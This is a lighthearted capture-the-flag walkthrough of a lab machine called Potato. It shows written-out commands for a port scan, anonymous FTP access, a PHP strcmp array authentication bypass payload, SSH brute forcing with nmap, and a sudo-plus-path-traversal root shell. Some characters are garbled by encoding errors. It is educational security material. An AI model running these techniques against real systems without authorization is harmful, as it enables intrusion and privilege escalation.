π₯ "Potato Hacks a Machine" β A Fun & Interactive Pentest Walkthrough
π Introduction
There are machines that fightβ¦ There are machines that hideβ¦ β¦and then there is this machine β a smug little box sitting at 192.168.238.101, daring me to break in.
What followed was a roller-coaster of ports, protocols, bypasses, and bash tricks⦠and yes, somewhere in the middle I almost head-butted my monitor.
Let me take you through the full journey β step by step, clean, technical, and with just enough chaos to keep things fun.
π Step 1: Full Port Sweep with Nmap
We begin with a trusty, smashing-fast port scan:
nmap -sCV -p- 192.168.238.101 β min-rate 10000 -o nmap
Nmap returns:
SSH β port 22
HTTP β port 80
FTP β portβ¦ 2112?!
Yes⦠2112. The one port number that feels like the machine is trolling us.
π Step 2: The Strange FTP on 2112
Of course I try anonymous login:
ftp 192.168.238.101 2112
Boom, I'm in. The FTP greets me with two files:
index.php.bak
welcome.msg
I download both:
get index.php.bak get welcome.msg
Reading them:
cat welcome.msg
"Welcome, archive user %U@%R ! The local time is: %T"
Nothing useful here⦠but index.php.bak? Oh boy.
$pass = "potato"; // note Change this password regularly
if($_GET['login']==="1"){ if (strcmp($_POST['username'], "admin") == 0 && strcmp($_POST['password'], $pass) == 0) { setcookie('pass', $pass, β¦ ); } }
We now have:
Username β admin
Password β potato
But where do we login?
π Step 3: Gobuster Enters the Scene
I blast the web directory to find hidden paths:
gobuster dir -u http://192.168.238.101/ \ -w /usr/share/dirb/wordlists/common.txt
And voilΓ :
/admin/
I rush to the login page, use admin:potato, and⦠slapped with "Bad user/password!"
Rude.
π€ Step 4: Rethinking the Login β The strcmp Trick
Looking back at the source code, I notice something juicy:
strcmp() is being used.
If strcmp() receives an array instead of a string, it returns NULL.
NULL == 0 in loose comparison β so PHP treats it as true.
This is a classic authentication bypass.
So I intercept the request using BurpSuite:
username=admin&password[]=potato
Send it in Repeater β Response: 200 OK.
Victory? Not exactly. The dashboard gave absolutely nothing. A waste of time.
So I pivot.
π Step 5: Brute Force SSH Using Nmap
I decide to brute-force SSH using one of Nmap's built-in scripts:
nmap -p 22 β script=/usr/share/nmap/scripts/ssh-brute.nse 192.168.238.101
After a tense wait⦠Nmap spits out valid creds:
webadmin : dragon
Now that's what I'm talking about!
π§βπ» Step 6: Logging in Over SSH ssh webadmin@192.168.238.101
Inside the machine:
cat local.txt
First flag obtained! π
I explore /home and discover another user:
florianges/
But the directory is empty. A dead end.
Time to escalate.
π₯ Step 7: Privilege Escalation via Sudo & Nice
Running:
sudo -l
Output:
(ALL : ALL) /bin/nice /notes/*
So I can run anything inside /notes/ with elevated privileges via nice.
I check inside /notes/ β nothing exploitable.
Then a fun idea hits me:
What if I reference a file outside the /notes directory using path traversal?
Linux won't stop me from doing:
/notes/../home/webadmin/shell.sh
Time to craft the payload:
echo -e '#!/bin/bash\nbash -i' > ~/shell.sh chmod +x ~/shell.sh
Now execute it with sudo:
sudo /bin/nice /notes/../home/webadmin/shell.sh
ROOTED. Instant interactive root shell.
cat /root/proof.txt
And there it is β the final flag. Game over. Machine pwned. π
π Conclusion
This machine was a fun mix of:
Weird FTP port choices
Authentication bypass techniques
A red herring login page
Nmap brute-forcing
Clever sudo exploitation using path traversal
The final privesc via nice was the cherry on top β simple, elegant, and satisfying.
If you enjoyed this walkthrough, share it, clap it, and stay tuned. More hacking adventures are on the way.
β Ishhishneet (Potato) π₯π»